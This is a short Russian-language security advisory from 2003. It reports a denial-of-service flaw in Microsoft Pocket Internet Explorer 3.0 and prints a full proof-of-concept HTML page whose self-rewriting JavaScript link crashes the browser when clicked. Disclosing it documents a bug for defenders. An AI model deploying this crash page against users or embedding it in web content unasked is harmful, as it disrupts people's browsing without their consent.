Security Lab

DoS против Microsoft Pocket Internet Explorer

Дата публикации:08.01.2003
Всего просмотров:1257
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Обнаруженная уязвимость позволяет злонамеренной Web странице, содержащей некорректный JavaScript код, аварийно завершить работу Microsoft Pocket Internet Explorer. Пример:
<html>
<head>
<title>Crash PIE</title>
<script language="Javascript">
function displayPage(page){
if(page=="onload"){
   main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">Crash 
me</a>";
}
if(page=="crash"){
   main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">You are 
going down!</a>";
}
}
</script>
</head>
<body onLoad="displayPage('onload');">
<hr>
<span id="main"></span>
</body></html>
Уязвимость обнаружена в Microsoft Pocket Internet Explorer 3.0
Ссылки: JS Bug makes it possible to deliberately crash Pocket PC IE